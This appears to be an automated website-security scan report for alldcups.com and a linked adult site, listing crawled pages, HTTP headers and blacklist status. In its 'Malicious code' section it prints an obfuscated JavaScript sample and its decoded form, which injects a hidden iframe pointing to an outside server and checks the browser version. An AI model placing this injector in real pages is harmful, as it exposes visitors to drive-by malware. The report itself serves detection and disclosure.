Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alldcups.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://alldcups.com/ | HTTP/1.1 200 OK Connection: close Date: Wed, 04 Mar 2015 01:28:18 GMT Accept-Ranges: bytes ETag: "183293-3019-482022ceb3480" Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 12313 Content-Type: text/html Last-Modified: Wed, 17 Mar 2010 17:09:22 GMT | clean |
http://www.titfix.com/ | 200 OK Content-Length: 88600 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function Jgfi(Lqqt, pdu8, Rdy1) { var EKq0; EKq0=Lqqt.split(pdu8); var Udh8=EKq0.join(Rdy1); return Udh8; }
function lNj7(Rzi0) { Rzi0 = Jgfi(Rzi0,"##+##","'"); Rzi0 = Jgfi(Rzi0,"##|##","\\"); Udh8=""; BmT2 ="";
for(k=0;k<Rzi0.length;k++) { Udh8 = Rzi0.charCodeAt(k);
if (Udh8==32){Udh8=35} else if (Udh8==35){Udh8=32} else if (Udh8==59){Udh8=64} else if (Udh8==64){Udh8=59} else if (Udh8==37){Udh8=42} else if (Udh8==42){Udh8=37} else if (Udh8>=97 && Udh8<=122) { Udh8=Udh8-97;Udh8=
Decoded script:
XjKe = 'http://bookrave.com/tmp/z/static.php';rlG1 = 'iframe';
AodU = document.createElement(rlG1);AodU.setAttribute('src', XjKe);
AodU.setAttribute('width',0);AodU.setAttribute('height',0);AodU.setAttribute('border',0);
AodU.setAttribute('style','width: 0; height: 0; border: none;');
AodU.setAttribute('style','display:none'); aKm0=navigator.userAgent.toLowerCase();
Bss4=aKm0.indexOf('msie');Rjk1=aKm0.indexOf('msie 8');DRn2=aKm0.indexOf('nt 6');
document.body.appendChild(AodU);
Antivirus reports:
http://www.titfix.com/blog/ | 200 OK Content-Length: 36922 Content-Type: text/html | clean |
http://www.titfix.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 01:28:21 GMT Location: http://www.titfix.com/blog/ Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 353 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.titfix.com/test404page.js | 404 Not Found Content-Length: 14540 Content-Type: text/html | clean |
http://www.titfix.com/blog/about/ | 200 OK Content-Length: 14929 Content-Type: text/html | clean |
http://www.titfix.com/blog/about/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 859 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/09/ | 200 OK Content-Length: 21911 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/carmen-from-busty-hookers/ | 200 OK Content-Length: 16563 Content-Type: text/html | clean |
http://www.titfix.com/blog/category/big-tits/ | 200 OK Content-Length: 23302 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/sugar-tits/ | 200 OK Content-Length: 17041 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/sugar-tits/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 872 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/08/ | 200 OK Content-Length: 25778 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/08/movie-theater-2/ | 200 OK Content-Length: 19089 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/08/movie-theater-2/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 877 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/07/ | 200 OK Content-Length: 25561 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/07/susie-wilden-interview/ | 200 OK Content-Length: 19150 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alldcups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 01:28:18 GMT
Accept-Ranges: bytes
ETag: "183293-3019-482022ceb3480"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 12313
Content-Type: text/html
Last-Modified: Wed, 17 Mar 2010 17:09:22 GMT
...12313 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alldcups.com
Referer: http://www.google.com/search?q=alldcups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.